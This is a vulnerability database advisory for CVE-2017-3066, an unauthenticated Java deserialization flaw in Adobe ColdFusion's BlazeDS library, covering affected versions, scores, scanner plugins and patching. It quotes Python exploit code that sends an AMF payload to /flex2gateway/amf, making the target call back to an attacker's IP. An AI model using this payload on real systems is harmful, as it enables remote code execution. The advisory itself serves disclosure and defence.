Adobe ColdFusion 10/11/2016 Apache BlazeDS Library deserialization

CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.

A vulnerability classified as critical was found in Adobe ColdFusion 10/11/2016 (Programming Language Software). Affected by this vulnerability is an unknown part of the component Apache BlazeDS Library. The manipulation with an unknown input leads to a deserialization vulnerability. The CWE definition for the vulnerability is CWE-502. The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid. As an impact it is known to affect confidentiality, integrity, and availability. The summary by CVE is:

Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution.

The bug was discovered 04/25/2017. The weakness was released 04/25/2017 as APSB17-14 as confirmed security bulletin (Website). The advisory is shared at helpx.adobe.com. This vulnerability is known as CVE-2017-3066 since 12/02/2016. The attack can be launched remotely. The exploitation doesn't need any form of authentication. Technical details are unknown but a public exploit is available.

A public exploit has been developed by Faisal Tameesh in Python and been published 11 months after the advisory. It is possible to download the exploit at exploit-db.com. It is declared as proof-of-concept. The vulnerability scanner Nessus provides a plugin with the ID 99731 (Adobe ColdFusion BlazeDS Java Object Deserialization RCE), which helps to determine the existence of the flaw in a target environment. It is assigned to the family CGI abuses and running in the context r. The commercial vulnerability scanner Qualys is able to test this issue with plugin 370381 (Adobe Security Hotfix for ColdFusion (APSB17-14)). The code used by the exploit is:

amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
              '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
              struct.pack('>I', int(callback_port)) + \
              '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

Applying a patch is able to eliminate this problem. A possible mitigation has been published immediately after the disclosure of the vulnerability.

The vulnerability is also documented in the databases at Tenable (99731) and Exploit-DB (43993). Entry connected to this vulnerability is available at 100620.
